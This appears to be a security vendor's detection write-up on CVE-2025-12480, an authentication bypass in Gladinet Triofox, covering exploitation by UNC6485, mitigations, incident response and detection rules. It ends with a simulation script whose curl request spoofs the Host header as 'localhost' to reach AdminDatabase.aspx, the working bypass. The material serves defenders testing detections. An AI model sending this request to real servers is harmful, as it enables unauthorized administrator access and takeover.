CVE-2025-12480: The SOC Report on Unauthenticated Access Control Vulnerability in Gladinet’s Triofox
Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Analysis
An improper access‑control vulnerability tracked as CVE‑2025‑12480 in Gladinet Triofox allowed unauthenticated attackers to bypass authentication entirely, access initial configuration pages even after setup, create new administrator accounts and then abuse built‑in features to execute arbitrary payloads. Given its high severity (CVSS 9.1) and real‑world exploitation, this bug poses a serious risk to organizations running vulnerable versions.
Investigation
Threat researchers at Mandiant (via Google Cloud) found that as early as August 24, 2025, threat cluster UNC6485 exploited the flaw by submitting HTTP requests with a manipulated Host header set to “localhost,” thereby bypassing the check in the function CanRunCriticalPage() and accessing setup pages like AdminDatabase.aspx and AdminAccount.aspx. Once inside, the attackers used the product’s anti‑virus configuration feature (which ran with SYSTEM privileges) to deploy a malicious batch script that downloaded a disguised payload (e.g., Zoho UEMS installer) and then installed remote access tools (Zoho Assist, AnyDesk) and established SSH reverse tunnels.
Mitigation
Organizations should ensure that they have upgraded Triofox to version 16.7.10368.56560 (or later), which resolves access to the initial configuration pages after setup. Additional mitigations include auditing and disabling unused native administrator accounts, restricting access to management interfaces by IP or network segment, verifying that the anti‑virus feature does not allow arbitrary path configuration or execution of untrusted binaries, and monitoring for anomalous outbound SSH/port 433 or RDP tunnelling.
Response
If you suspect compromise of a Triofox server, isolate the affected host immediately, review HTTP logs for suspicious Host header values (e.g., “localhost”), examine for unauthorized admin account creation, and look for evidence of malicious file uploads, reverse‑tunnel tooling, or unusual process execution from the Triofox service. Then re‑image or restore the host with the patched software version, reset affected credentials and rotate credentials on auxiliary tools, and report the incident to your national CERT or security authority. Finally, update your threat‑hunting or SIEM rules to detect this attack chain (authentication bypass → new admin account → antivirus path abuse → payload download → remote access tool installation) going forward.
Attack Flow
Detection Rules
Suspicious HTTP Host Header Attack on Triofox [Webserver]
View
Execution of Malicious Batch Script via Triofox Anti-Virus Path Abuse [Windows Process Creation]
View
IOCs (ip) to detect: No Place Like Localhost: Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480
View
IOCs (hash) to detect: No Place Like Localhost: Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480
View
Simulation Instructions
-
Attack Narrative & Commands:
An attacker, having identified the vulnerableAdminDatabase.aspxendpoint, crafts an HTTP GET request that sets theHostheader tolocalhost. This tricks the application into treating the request as an internal call, potentially bypassing access controls and enabling further exploitation (e.g., uploading a web‑shell). The attacker also sends a secondary request where theRefererheader containshttp://localhost/to satisfy the alternative detection condition. Both requests are issued usingcurlto ensure raw header control. -
Regression Test Script:
#!/usr/bin/env bash # ------------------------------------------------- # Simulate Host Header attack against AdminDatabase.aspx # ------------------------------------------------- TARGET="http://vulnerable-webapp.example.com" ENDPOINT="/AdminDatabase.aspx" echo "[*] Sending GET request with malicious Host header (selection2)..." curl -s -o /dev/null -w "%{http_code}\n" \ -H "Host: localhost" \ -H "User-Agent: Mozilla/5.0" \ "${TARGET}${ENDPOINT}"